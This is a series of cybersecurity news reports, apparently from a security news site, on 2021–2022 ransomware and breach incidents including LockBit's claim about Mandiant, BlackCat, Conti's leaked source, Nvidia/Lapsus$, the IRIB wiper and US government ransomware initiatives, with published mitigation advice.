Mandiant: “No evidence” we were hacked by LockBit ransomware
American cybersecurity firm Mandiant is investigating LockBit ransomware gang’s claims that they hacked the company’s network and stole data.
The ransomware group published a new page on its data leak website earlier today, saying that the 356,841 files they allegedly stole from Mandiant will be leaked online.
“All available data will be published!” the gang’s dark web leak site threatens under a timer showing just under three hours left until the countdown ends.
LockBit has yet to reveal what files it claims to have stolen from Mandiant’s systems since the file listing on the leak page is empty.
However, the page displays a 0-byte file named ‘mandiantyellowpress.com.7z’ that appears to be related to a mandiantyellowpress.com domain (registered today). Visiting this page redirects to the ninjaflex.com site.
When BleepingComputer reached out for more details on LockBit’s claims, the threat intel firm said it hadn’t yet found evidence of a breach.
“Mandiant is aware of these LockBit-associated claims. At this point, we do not have any evidence to support their claims. We will continue to monitor the situation as it develops,” Mark Karayan, Mandiant’s Senior Manager for Marketing Communications, told BleepingComputer.
Mandiant says it's looking into Lockbit ransomware gang's claims:
“Mandiant is aware of these LockBit-associated claims. At this point, we do not have any evidence to support their claims. We will continue to monitor the situation as it develops.” pic.twitter.com/JLM5ob1yCi
These claims come after Mandiant revealed in a report published last week that the Russian Evil Corp cybercrime group has now switched to deploying LockBit ransomware on targets’ networks to evade U.S. sanctions.
Mandiant announced in March that it entered into a definitive agreement to be acquired by Google in an all-cash transaction valued at roughly $5.4 billion.
The LockBit ransomware gang has been active since September 2019 as a ransomware-as-a-service (RaaS) and relaunched as the LockBit 2.0 RaaS in June 2021 after ransomware actors were banned from posting on cybercrime forums [1, 2].
Accenture, a Fortune 500 company and one of LockBit’s victims, confirmed to BleepingComputer in August 2021 that it was breached after the gang asked for a $50 million ransom not to leak data stolen from its network.
Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly announced the formation of a joint ransomware task force, plans for which were originally outlined in the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA).
Easterly announced the news at an Institute for Security and Technology (IST) event on May 20 in Washington, D.C., and also said the task force would have its first official meeting within the next few months.
“We’re very excited about it,” Easterly said during an event interview. “We think that this will actually build really nicely on the infrastructure and the scaffolding that we’ve developed with the [Joint Cyber Defense Collaborative] to use what we have as part of the federal cyber ecosystem and the companies that are part of the JCDC alliance to plug into the hub as envisioned in the Ransomware Task Force Report.”
She added that the FBI will co-chair the task force, which means the operational leads will be Eric Goldstein, CISA’s head of cyber and Bryan Vorndran, the assistant director of the FBI’s Cyber Division.
CIRCIA’s Reporting Requirements
Passed as part of the omnibus spending bill in March, CIRCIA focuses on critical infrastructure companies—ranging from financial services firms to energy companies, or other entities where a cybersecurity event would impact economic security or public health and safety.
CIRCIA would require these entities to report any substantial cybersecurity incidents or ransom payments to the federal government within 72 and 24 hours, respectively.
The Institute for Security and Technology issued a report last year that included a framework to combat the rising threat of ransomware.
Former State Department cybersecurity coordinator Chris Painter, also a co-chair of the ransomware task force working groups, explained during the IST event that combating ransomware threats requires a high degree of coordination and cooperation between government agencies.
“Establishing the new task force signals that this issue continues to be a priority and is a recognition that combating ransomware will take a sustained, long-term effort,” he said. “It should work to leverage federal and private sector capability to disrupt the major ransomware actors in any way possible.”
Easterly said the focus would be on operationalizing progress in an agile way and disrupting these bad actors, with CISA on the resilience/defense side.
“We want to work with all of our partners across the federal cyber ecosystem and the industry to actually be able to go after these actors in a very agile way at scale,” she said.
She said the days of holding threat report briefings on a quarterly basis are long over; it is no longer a realistic way of protecting critical infrastructure threats.
“We all have to be in the room all the time, sharing information constantly so that we can create that picture together, because it’s very likely that industry is going to see a cyberattack on the homeland before we see it,” Easterly said. “So, we have to be in the same room—we have to trust each other.”
Beyond Ransomware
The event also featured a keynote address from Deputy Attorney General Lisa Monaco, who announced twin initiatives from the Department of Justice.
The first is aimed at tackling illegal cryptocurrency transactions while the second concerns the establishment of a cybersecurity operations international liaison position to speed up international operations aimed at disrupting the activities of cybersecurity threat actors globally
“We’ve got to evolve to keep pace with the threat and the nation-states and criminal actors driving it,” Monaco said.
Matthew Warner, CTO and co-Founder at Blumira, a provider of automated threat detection and response technology, said as attacks against businesses and infrastructure have continued to grow, so has the impact of these attacks.
“Ransomware is a systemic risk to all computing at this point, which requires a unique response from governments,” he said. “To do this, however, requires a task force that can respond in a way that we have not seen before in cybersecurity.”
He explained if governments wanted to defend their and their allies’ infrastructures—commercial or not—then reducing ransomware across the globe is paramount.
Alex Ondrick, director of security operations at BreachQuest, an incident response specialist, noted that information-sharing and trust-building between government and private business is long overdue by at least a decade, but that initiatives such as JRTF could improve upon a growing private-public partnership.
“Governments have come to increasingly rely on the private sector, yet governments are only just beginning to reciprocate information-sharing,” he said. “Given new legislation and interest, CISA’s JRTF has an opportunity to increase the lines of communication and improve information-sharing.”
Ondrick added that an increasingly decentralized ransomware threat landscape has created an opportunity for more ransomware-as-a-service (RaaS) attackers and more ransomware attacks overall.
“Ransomware has become a key fixture of cybercrime as we move towards a post-COVID-19 world, and ransomware—as related to critical infrastructure—continues to evolve,” he said. “Preventing a ransomware attack against critical infrastructure is of the utmost seriousness and urgency.
Regarding the DoJ’s initiative tackling illegal cryptocurrency transfers, Warner pointed out that the nature of blockchain—and therefore, cryptocurrencies—means every transaction is available for the world to see.
“While attackers will try to move this money around through tumblers, in the end, it must end up somewhere to convert to usable currency,” he said. “Government and NGO initiatives have the opportunity to track cryptocurrency use and look for clusters of ransomware payments being funneled through the blockchain.”
If the target wallets and/or transfers in and out of these potential ransomware wallets can be identified, then governments can disrupt the actors by seizing cryptocurrency from them—this was the case when the U.S. seized $30 million in cryptocurrency from the NetWalker ransomware group in early 2021.
“Ransomware will only continue to grow, as will new attacks leveraged by ransomware, which means that not only the government but also all private entities must level up quickly to defend properly,” Warner said.
At least 60 entities worldwide have been breached by BlackCat ransomware, warns a flash report published by the U.S. FBI.
The U.S. Federal Bureau of Investigation (FBI) published a flash report that states that at least 60 entities worldwide have been breached by BlackCat ransomware (aka ALPHV and Noberus) since it started its operations in November.
“The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with attacks involving BlackCat/ALPHV, a Ransomware-as-a-Service that has compromised at least 60 entities worldwide.” reads the flash advisory. “CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000167-MW and apply the recommended mitigations.”
The BlackCat/ALPHV a Ransomware was first discovered in December by malware researchers from Recorded Future and MalwareHunterTeam. The malware is the first professional ransomware strain that was written in the Rust programming language.
BlackCat can target Windows, Linux, and VMWare ESXi systems, but at this time the number of victims is limited. The popular malware researcher Michael Gillespie said that the BlackCat ransomware is “very sophisticated.
Recorded Future experts speculate that the author of the BlackCat ransomware, known as ALPHV, was previously involved with the REvil ransomware operations.
According to the alert, many of the developers and money launderers for gang are linked to Darkside/Blackmatter operations.
ALPHV has been advertising the BlackCat Ransomware-as-a-Service (RaaS) on the cybercrime forums XSS and Exploit since early December. Like other ransomware groups, the gang also implements a double-extortion model, threatening to leak the stolen data if the victims don’t pay.
ALPHV is attempting to recruit affiliates for its operations, offering them between 80% and 90% of the final ransom, depending on its value. The BlackCat operations only hit a small number of victims at this time in the USA, Australia, and India.
Ransom demands range from a few hundreds of thousands up to $3M worth of Bitcoin or Monero.
The alert includes indicators of compromise (IoCs) associated with BlackCat/ALPHV, as of mid-February 2022.
The FBI is seeking any information that can be shared related to the operations of the BlackCat ransomware operation.
Below are recommended mitigations included in the alert:
Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
Regularly back up data, air gap, and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating system defined or recognized scheduled tasks for unrecognized “actions” (for example: review the steps each scheduled task is expected to perform).
Review antivirus logs for indications they were unexpectedly turned off.
Implement network segmentation.
Require administrator credentials to install software.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
Use multifactor authentication where possible.
Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts.
Implement the shortest acceptable timeframe for password changes.
Kaspersky discovered a flaw in the encryption process of the Yanluowang ransomware that allows victims to recover their files for free.
Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that can be exploited to recover the files encrypted by the malware without paying the ransom.
The Yanluowang ransomware was first spotted by researchers from Symantec Threat Hunter Team in October 2021, the malware was used in highly targeted attacks against large enterprises.
The discovery is part of an investigation into an attempted ransomware attack against a large organization.
Kaspersky implemented the decrypting process for the Yanluowang ransomware in its RannohDecryptor tool. In order to decrypt their files, victims of this family of ransomware should have at least one original file.
“Kaspersky experts have analyzed the ransomware and found a vulnerability that allows decrypting files of affected users via a known-plaintext attack.” reads the post published by the company.
The Yanluowang ransomware uses different encryption routines depending on the size of the files.
Files greater than 3GB using are partially encrypted in stripes, 5MB after every 200MB, while files smaller than 3GB are completely encrypted from beginning to end.
For this reason, to decrypt files the following conditions must be met:
To decrypt small files (less than or equal to 3 GB), users need a pair of files with a size of 1024 bytes or more. This is enough to decrypt all other small files.
To decrypt big files (more than 3 GB), users need a pair of files (encrypted and original) no less than 3 GB in size each. This will be enough to decrypt both big and small files.
“By virtue of the above points, if the original file is larger than 3 GB, it is possible to decrypt all files on the infected system, both big and small. But if there is an original file smaller than 3 GB, then only small files can be decrypted.” continues the post.
The Symantec researchers noticed the use of the legitimate AdFind command line Active Directory query tool that is often abused by ransomware operators as a reconnaissance tool.
Before being deployed on compromised devices, the attackers launch a malicious tool designed to prepare the environment with the following actions:
Creates a .txt file with the number of remote machines to check in the command line
Uses Windows Management Instrumentation (WMI) to get a list of processes running on the remote machines listed in the .txt file
Logs all the processes and remote machine names to processes.txt
The analysis of the samples collected by the experts revealed that the Yanluowang ransomware uses the Windows API for encryption.
Upon deploying the Yanluowang ransomware, it will stop hypervisor virtual machines, end all processes logged by the above tool (including SQL and back-up solution Veeam), then it will encrypt files. The ransomware appends the .yanluowang extension to the filenames of the encrypted files.
The ransom note (README.txt) dropped on the infected machine warns the victims not to contact law enforcement or ask ransomware negotiation firms for help. The ransomware operators will launch distributed denial of service (DDoS) attacks against the victim if it will not respect their rules. The ransomware operators also threaten to make calls to employees and business partners to damage the brand reputation of the victims, along with targeting again the victim in a few weeks and delete its data.
A Ukrainian security researcher has leaked more source code from the Conti ransomware operation to protest the gang’s position on the conflict.
Hacker leaked a new version of the Conti ransomware source code on Twitter as retaliation of the gang’s support to Russia
The attack against the Conti ransomware and the data leak is retaliation for its support for the Russian invasion of Ukraine.
The attack will have a significant impact on the operation of the gang, considering also that many of Conti’s affiliates are Ukrainian groups.
Recently a Ukrainian researcher leaked 60,694 messages internal chat messages belonging to the Conti ransomware operation after the announcement of the group of its support to Russia. He was able to access the database XMPP chat server of the Conti group.
In a second round, the expert leaked the old source code for the Conti ransomware encryptor, decryptor, and builder, along with the administrative panel and the BazarBackdoor API. The leaked old Conti ransomware source code is dated September 15th, 2020.
The source code for the ransomware is contained in a password-protected archive, despite the researcher did not leak the password, another expert cracked it and share it.
The public availability of the source code could temporarily destroy the Conti ransomware operation because security experts could perform reverse engineering to determine how it works and develop a working decrypted.
On the other side, other threat actors could perform reverse engineering to develop their own version of the threat, a circumstance that opens to worrisome scenarios.
Now the Ukrainian security researcher has leaked newer malware source code from the Conti ransomware operation, the code is dated January 25th, 2021.
The code appears to be more recent than the previous leak, according to Bleeping Computer Conti Leaks uploaded the source code for Conti version 3 to VirusTotal and shared a link on Twitter.
“The source code compiles without error and can be easily modified by other threat actors to use their own public keys or add new functionality.” reported BleepingComputer.“BleepingComputer compiled the source code without any issues, creating the cryptor.exe, cryptor_dll.dll, and decryptor.exe executables.”
Chipmaker giant Nvidia confirmed a data breach after the recently disclosed security incident, proprietary information stolen.
The chipmaker giant Nvidia was recentty victim of a ransomware attack that impacted some of its systems for two days. The security breach is not connected to the ongoing crisis in Ukraine, according to a person familiar with the incident.
The incident also impacted the company’s developer tools and email systems, but business and commercial activities were not affected.
“Our business and commercial activities continue uninterrupted,” Nvidia said in a statement. “We are still working to evaluate the nature and scope of the event and don’t have any additional information to share at this time.”
The Lapsus$ ransomware gang is claiming responsibility for this attack, the group announced to have stolen 1 TB of data from Nvidia’s network. The ransomware gang leaked online around 20GB of data, including credentials for all Nvidia employees.
The company launched an investigation into the incident to determine the extent of the intrusion that confirmed that the attackers have stolen data from the chipmaker.
NVIDIA said employee credentials and proprietary information were stolen during a cyberattack they announced on Friday.
The chipmaker giant discovered the intrusion on February 23, the attack also impacted its IT resources.
“Access to NVIDIA employee VPN requires the PC to be enrolled in MDM (Mobile Device Management). With this they were able to connect to a [virtual machine] we use. Yes they successfully encrypted the data,” the group claimed in a subsequent message.” the LAPSU$ ransomware gang wrote on its Telegram change. “However we have a backup and it’s safe from scum! We are not hacked by a competitors groups or any sorts.”
Lapsus$ claim responsibility for the hack on Nvidia – and also claim that Nvidia successfully hacked back. pic.twitter.com/F8ocpB6Qev
Below is the statement shared by NVIDIA with some websites and published by BleepingComputer.
“On February 23, 2022, NVIDIA became aware of a cybersecurity incident which impacted IT resources. Shortly after discovering the incident, we further hardened our network, engaged cybersecurity incident response experts, and notified law enforcement.” reads the statement. “We have no evidence of ransomware being deployed on the NVIDIA environment or that this is related to the Russia-Ukraine conflict. However, we are aware that the threat actor took employee credentials and some NVIDIA proprietary information from our systems and has begun leaking it online. Our team is working to analyze that information. We do not anticipate any disruption to our business or our ability to serve our customers as a result of the incident.”
Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), was hit by a wiper malware in late January 2022.
An investigation into the attack that hit the Islamic Republic of Iran Broadcasting (IRIB) in late January, revealed the involvement of a disruptive wiper malware along with other custom-made backdoors, and scripts and configuration files used to install and configure the malicious executables.
Researchers from CheckPoint that investigated the attack reported that the attackers used a wiper malware to disrupt the state’s broadcasting networks, damaging both TV and radio networks.
According to the experts, the effects of the attack were more serious than officially reported.
Check Point was not able to find any evidence that demonstrates a previous use of these tools, or attribute them to a specific threat actor.
During the attack, threat actors transmitted pictures of Mujahedin-e-Khalq Organization (MKO) leaders Maryam and Massoud Rajavi along with the image of Ayatollah Khamenei crossed out with red lines and the declaration “Salute to Rajavi, death to (Supreme Leader) Khamenei!.”
“During a period of 10 seconds, the faces and voices of hypocrites appeared on (our) Channel One,” IRIB said.
“Our colleagues are investigating the incident. This is an extremely complex attack and only the owners of this technology could exploit and damage the backdoors and features that are installed on the systems,” Deputy IRIB chief Ali Dadi told state TV channel IRINN.
“Similar disruptions happened to the Koran Channel, Radio Javan and Radio Payam,” he added, referring to other state-affiliated broadcast channels.
The experts discovered two identical .NET samples named msdskint.exe that were used to wipe the files, drives, and MBR on the infected devices, making them unusable.
The malware has also the ability to clear Windows Event Logs, delete backups, kill processes, and change users’ passwords.
The report details the use of four backdoors in the attack:
WinScreeny, used to make screenshots of the victim’s computer;
HttpCallbackService, a Remote Administration Tool (RAT);
HttpService, another backdoor that listens on a specified port;
ServerLaunch, a C++ dropper.
Iranian officials attribute the attack to MEK, however, the opposition group itself denies any involvement.
The hacktivist group Predatory Sparrow, which claimed responsibility for the attacks against the national railway services, the transportation ministry, and the Iranian gas stations, claimed responsibility for the attack on IRIB via its Telegram channel.
“The use of wiper malware in the attack against a state entity in Iran begs us to compare the tools with those belonging to Indra, who, among other attacks, is responsible for unleashing a wiper in the Iranian Railways and Ministry of Roads systems. Although these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra’s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks happened in Iran.” the researchers conclude.
American worldwide logistics and freight forwarding company Expeditors International shuts down global operations after cyber attack
American logistics and freight forwarding company Expeditors International was hit by a cyberattack over the weekend that paralyzed most of its operations worldwide.
Expeditors company has over 18,000 employees worldwide and has annual gross revenue of around $10 billion. The company discovered the attack on February 20, 2022, it doesn’t provide details about the attack and announced to have launched an investigation into the incident.
“Expeditors International of Washington, Inc. (NASDAQ:EXPD) announced that on February 20, 2022, we determined that our company was the subject of a targeted cyber-attack. Upon discovering the incident, we shut down most of our operating systems globally to manage the safety of our overall global systems environment.” reads the announcement published by the company. ”The situation is evolving, and we are working with global cybersecurity experts to manage the situation. While our systems are shut down we will have limited ability to conduct operations, including but not limited to arranging for shipments of freight or managing customs and distribution activities for our customers’ shipments.”
The information publicly available on the attack suggests the company was the victim of a ransomware attack and was forced to shut down its network to avoid the threat from spreading.
The attack impacted the company’s operations, including the capability to arrange for shipments of freight or managing customs and distribution activities for our customers’ shipments.
The company hired cybersecurity experts to investigate the security breach and recover from the attack.
The company warned the incident could have a material adverse impact on our business, revenues, results of operations and reputation
“We are incurring expenses relating to the cyber-attack to investigate and remediate this matter and expect to continue to incur expenses of this nature in the future. Depending on the length of the shutdown of our operations, the impact of this cyber-attack could have a material adverse impact on our business, revenues, results of operations and reputation.” concludes the advisory.
I transcribed a recent interview, here some questions and answers about nation-state hacking, spyware, and cyber warfare. Enjoy”
How has spyware changed the rules of cyber security in recent years? What will cyber security look like now that those tools are all over the internet?
In the last decade, we have observed a progressive weaponization of cyberspace. NATO recognized cyberspace as a new domain of warfare. Cyberspace is the new battlefield for nation-state actors, the digital place where international crime rings operate threatening the pillars of our digital society.
Spyware are powerful weapons in the arsenal of governments and cybercrime gangs. These tools are even more sophisticated and are able to evade detection by using so-called zero-day exploits allowing attackers to bypass the defense of government organizations and businesses. Spyware allows attackers to steal sensitive info from the targets, and perform a broad range of malicious activities.
Is the Pegasus spyware as a game-changer?
Pegasus is probably the most popular surveillance software on the market, it has been developed by the Israeli NSO Group. Anyway, it is not the only one. Many other surveillance firms develop spyware that are every day abused in dragnet surveillance and target journalists, dissidents, and opponents of totalitarian regimes. These software are developed for law enforcement and intelligence agencies, but they are often abused by many governments worldwide cyber espionage operations. The surveillance business is growing in the dark and is becoming very dangerous.
Which are devices of cyber warfare and cyber espionage?
Every technological device can be abused for cyber warfare and cyber espionage. Malware, spyware are the most common means but do not forget the power of social network platforms that can be used for surveillance and misinformation purposes.
Many governments have fallen victim to massive ransomware attacks from groups linked to organized crime, how bad can this new trend of hacking get?
Every day we read about major attacks targeting organizations worldwide with severe impact on their operations. The situation is going worse despite the numerous operations of law enforcement on a global scale. The number of ransomware attacks spiked in the last couple of years due to the implementation of the Ransomware-as-a-Service model, this means that tens of ransomware gangs have created a network of affiliates and provided them their malware. Almost any criminal group could become an affiliate, obtain ransomware from a gang, and spread it, this is amplifying the damages. Critical infrastructure are even more exposed to a new generation of threats that are more aggressive and sophisticated.
Reports are coming out linking North Korea to illegal online activities related to cryptocurrency. How are some governments using the Internet to threaten world peace in one way or another?
When dealing with nation-state actors you must consider the main motivation behind the attacks and distinguish the technique, tactics, and procedure adopted by the different state-sponsored groups.
For example, China-linked nation-state actors are more focused on cyberespionage aimed at stealing intellectual property, while Russia-linked Advanced Persistent Threat groups often operate to destabilize the political contest of foreign states, carry out cyber espionage activities, and conduct disinformation campaigns. North Korea-linked threat actors carry out financially motivated attacks against banks and cryptocurrency firms worldwide to steal funds to re-invest in their military industry.
What about the resilience of countries’ infrastructure to face such kind of war?
We need norms of state behavior in the cyber space and more information sharing on cyber threats. We need to share information about the attacks in an early stage, profiling the threat actors to mitigate and prevent their campaigns. It is essential to increase the level of security of critical infrastructure like power grids, power plants and hospitals. Critical infrastructure are the main targets of nation-state actors in a cyber warfare contest.
Is making the internet a safe place technically possible?
Let me use the title of a famous book, “No place to hide”. I mean that both nation-state actors and cybercriminal organizations are spending a growing effort to increase their hacking capabilities and evasion techniques. Unfortunately, today most of the organizations still consider cybersecurity a cost to cut and this approach gives the attackers an immense advantage. We need a cultural change and we must consider that a security by design approach is the unique way to make the Internet a safe place. We also need globally recognized norms of responsible state behavior in cyberspace.
The master decryption keys for the Maze, Egregor, and Sekhmet ransomware families were released on the BleepingComputer forums by the alleged malware developer.
The Maze group was considered one of the most prominent ransomware operations since it began operating in May 2019. The gang was the first to introduce a double-extortion model in the cybercrime landscape at the end of 2019. At the end of 2019, the Maze ransomware implemented data harvesting capabilities and started threatening the victims to release the stolen data for all those victims who refuse to pay the ransom.
In November 2020, the Maze ransomware operators announced that they have officially shut down their operations and denied the creation of a cartel.
Maze operation then rebranded in September as Egregor, but on February 2021 several members of the Egregor group were arrested in Ukraine.
The Sekhmet operation was launched in March 2020 and it has some similarities with the above ransomware operations.
While TTP’s of Egregor operators are almost identical to that of ProLock, the analysis of Egregor ransomware sample obtained during an incident response conducted by Group-IB revealed that the executable code of Egregor is very similar to Sekhmet. The two strains share some core features, use similar obfuscation technique. Egregor source code bears similarities with Maze ransomware as well.
Now the decryption keys for these operations have now been leaked in theBleepingComputer forums. The keys were shared by a user named ‘Topleak’ who claims to be the developer for all three operations.
“Hello, It’s developer. It was decided to release keys to the public for Egregor, Maze, Sekhmet ransomware families. also there is a little bit harmless source code of polymorphic x86/x64 modular EPO file infector m0yv detected in the wild as Win64/Expiro virus, but it is not expiro actually, but AV engines detect it like this, so no single thing in common with gazavat.” the user wrote on the forum.
“Each archive with keys have corresponding keys inside the numeric folders which equal to advert id in the config. In the “OLD” folder of maze leak is keys for it’s old version with e-mail based. Consider to make decryptor first for this one, because there were too many regular PC users for this version. Enjoy!”
TopLeak user pointed out that it is a planned leak, and is not linked to recent arrests and takedowns conducted by law enforcement. The alleged ransomware developer added that none of the ransomware gang will ever return in ransomware operation and that the source code of tools ever made is wiped out.
In one of the archives leaked by the user there is the source code for a malware dubbed ‘M0yv’ that was part of the gang’s arsenal.
The popular malware researchers Michael Gillespie and Fabian Wosar confirmed to BleepingComputer that they are decryption keys are legitimate and allow to decrypt files encrypted by the three ransomware families for free.
Emsisoft has released a decryptor a free decryption tool for the Maze, Egregor, and Sekhmet ransomware
More than 3,600 network-attached storage (NAS) devices from Taiwanese company QNAP have been infected and had their data encrypted by a new strain of ransomware named Deadbolt.
Devices attacked by the Deadbolt gang are easy to recognize because the login screen is typically replaced with a ransom note, and local files are encrypted and renamed with a .deadbolt extension.
The threat actor behind the attacks is extorting not only the owners of the NAS devices but also the QNAP company itself.
According to a copy of the ransom note, device owners are told to pay 0.03 Bitcoin ($1,100) to receive a decryption key to unlock their files, while in an second note, the hackers demand 5 Bitcoin ($1.86 million) from QNAP to reveal details about the supposed zero-day vulnerability they have been using to attack its users, and another 50 Bitcoin ($18.6 million) to release a master decryption key that unlock all of the victims’ files.
For its part, QNAP was quick to formally acknowledge the attacks in a blog post on Wednesday, hours after hundreds of users started flocking to its support forum to report finding their files encrypted.
In the first days following the attack, the company has been telling users to disconnect devices from the internet and, if not possible, at least disable features such as port forwarding and UPnP on their routers, to prevent attackers from connecting to the NAS systems.
) in the Log4j library to gain access to VMware Horizon systems.
The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen to the victims that will not pay the ransom.
Researchers from MalwareHunterteam first spotted the ransomware family, once encrypted a file, the ransomware appends the ‘.nightsky‘ extension to encrypted file names.
In early January, threat actors started targeting VMware Horizon systems exposed on the Internet. VMware has addressed Log4Shell in Horizon with the release of 2111, 7.13.1, 7.10.3 versions, but unfortunately many unpatched systems are still exposed online.
On Monday, Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.
We have observed a China-based ransomware operator that we’re tracking as DEV-0401 exploiting the CVE-2021-44228 vulnerability in Log4j 2 (aka #log4shell) targeting internet-facing systems running VMWare Horizon. https://t.co/6GOdRwRTjk
— Microsoft Security Intelligence (@MsftSecIntel) January 11, 2022
The AvosLocker ransomware operation provided a free decryptor after they encrypted the systems of a US government agency.
AvosLocker RaaS operators trying to avoid heat after hitting a US government entity by providing them the decryptor for free. pic.twitter.com/zFg7Idj9Zs
According to BleepingComputer, the gang hit a police department but fearing the reaction of US law enforcement opted to release a free decryptor to the government entity.
The incident is casual, one of the affiliates of the RaaS service hit the government agency and AvosLocker discovered the name of the victim only after their malware encrypted its systems.
Recently major ransomware operations were targeted by international operations conducted by law enforcement. In recent months, the police identified and arrested members and affiliated with several gangs, including REvil, Egregor, and Clop ransomware gangs.
Despite the success of the police operations, ransomware gangs continue to target organizations worldwide, in 2021 several groups rebranded as new operations to evade sanctions.
BleepingComputer, which has reached AvosLocker gang, said that its operators are “not worried about law enforcement as they have no jurisdiction in the motherland.”
This is another problem, the fight against ransomware gangs needs the collaboration of law enforcement agencies of any country, especially Russia where many ransomware groups have their origin.
The dilemmas organizations must deal with are dizzying:
To pay a ransom or not?
Will cyber insurance provide adequate shelter?
What’s the role of government?
Are new mandates and penalties on the horizon?
How are adversaries evolving their tactics?
To make sense of it all, let’s first focus on the adversaries and their playbook. Cyber criminals have a well-developed business model and carefully contemplated financial calculus of ransomware. They have determined whether they will launch a direct attack to maximize profits or offer Ransomware-as-a-Service, complete with a help desk and other support services, to supplement their income while enabling malicious actors with less technical skill.
They have researched their victims and targeted organizations based on their ability to pay. All these tactics are developed and executed in concert to make paying the ransom the path of least resistance – financially and logically.
Every aspect of a ransomware campaign is calculated to elicit an emotional response from the target such that it is easier to pay the ransom than to bear the costs and delays of trying to recover on their own.
The FIN7 hacking group is attempting to enter in the ransomware business and is doing it with an interesting technique. The gang space creates fake cybersecurity companies that hire experts requesting them to carry out pen testing attacks under the guise of pentesting activities.
FIN7 is a Russian criminal group that has been active since mid-2015, it focuses on restaurants, gambling, and hospitality industries in the US to harvest financial information that was used in attacks or sold in cybercrime marketplaces.
One of the companies created by the cyber criminal organizations with this purpose is Combi Security, but researchers from Gemini Advisory discovered other similar organizations by analyzing the site of another fake cybersecurity company named Bastion Security.
The Bastion Secure website is hosted on the Russian domain registrar Beget, which is popular in the Russian cybercrime communities. Most of the submenus of the site return a Russian-language HTTP 404 error, a circumstance that suggests the site creators were Russian speakers. At the time of the report, some of the HTTP 404 errors remain unfixed.
The website is a clone of the website of Convergent Network Solutions Ltd, Bastion Secure’s ‘About’ page states that is a spinoff of the legitimate cybersecurity firm that anyway not linked to the criminal gang.
FBI, CISA, NSA have published a joint advisory about the operation of the BlackMatter ransomware gang and provides defense recommendations.
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have published an advisory that provides details about the BlackMatter ransomware operations and defense recommendations.
This advisory provides information on tactics, techniques, and procedures (TTPs) associated with the ransomware gang that were obtained from the analysis of a sample of BlackMatter ransomware as well from trusted third-party reporting.
The BlackMatter group launched its operations at at the end of July, the gang claims to be the successor of Darkside and REvil groups. Like other ransomware operations, BlackMatter also set up its leak site where it publishes data exfiltrated from the victims before encrypting their system.
The launch of the BlackMatter ransomware-as-a-service (RaaS) was first spotted by researchers at Recorded Future who also reported that the gang is setting up a network of affiliates using ads posted on two cybercrime forums, such as Exploit and XSS.
There was $590 million in suspicious activity related to ransomware in the first six months of 2021, exceeding the entire amount in 2020, when $416 million was reported, according to a report released Friday by the U.S. Treasury Department’s Financial Crimes Enforcement Network.
The average amount of reported ransomware transactions per month in 2021 was $102.3 million, according to the report. If the current trend continues, suspicious activity reports filed in 2021 “are projected to have a higher ransomware-related transaction value than SARs filed in the previous 10 years combined,” according to the report. SARs is shorthand for suspicious activity reports.
U.S. based cybersecurity companies filed most of the SARs related to ransomware while banks and cryptocurrency exchanges filed more than a third of the reports. The reports reflect just how quickly ransomware attacks have grown.
The report offers new insight into the scale of ransomware attacks devastating U.S. businesses and impacting critical infrastructure. A Treasury spokesperson said the SARs don’t represent all ransomware payments.
Reporting ransomware payments to the Treasury via a suspicious activity report is often a requirement of cybersecurity insurance policies, according to a person familiar with the matter.
The Treasury Department also identified 68 ransomware variants, noting that the most commonly reported types were REvil, Conti and DarkSide. Ransomware groups often sell their malware, or variant, to affiliates who then use it to plot attacks, in what is known as ransomware-as-a-service. REvil, Conti and DarkSide are suspected by cybersecurity firms of being tied to Russia in some way — because they use the Russian language or are suspected of being based there.
The report was filed as the Treasury Department issued guidance to the virtual currency industry to prevent exploitation by entities sanctioned by the U.S. and ransomware groups. It is part of a broader effort by the Biden administration to attempt to curb ransomware attacks. In ransomware attacks, hackers encrypt a victim’s files and promise to unlock them if they are paid a fee.
Among the more notable attacks were those in May on Colonial Pipeline Co. in May that squeezed fuel supplies on the East Coast and on the meatpacker JBS SA.
The Treasury report stated that ransomware actors are increasingly requesting payment in cryptocurrencies like Monero, which are designed to enhance anonymity.
A joint cybersecurity advisory published by US agencies revealed that three ransomware attacks on wastewater systems this year.
A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched by Ransomware gangs against US water and wastewater treatment facilities (WWS) this year.
This is the first time that these attacks are publicly disclosed, they took place in March, July, and August respectively. The three facilities hit by ransomware operators are located in the states of Nevada, Maine, and California. In all the attacks the ransomware encrypting files on the infected systems and in one of the security incidents threat actors compromised a system used to control the SCADA industrial equipment.
The advisory reports common tactics, techniques, and procedures (TTPs) used by threat actors to compromise IT and OT networks of WWS facilities, they include:
Spearphishing campaign aimed at the personnel to deliver malicious payloads such as ransomware and RAT;
Exploitation of services and applications exposed online that enable remote access to WWS networks (i.e. RDP accesses);
Exploitation of vulnerabilities affecting control systems running vulnerable firmware versions.
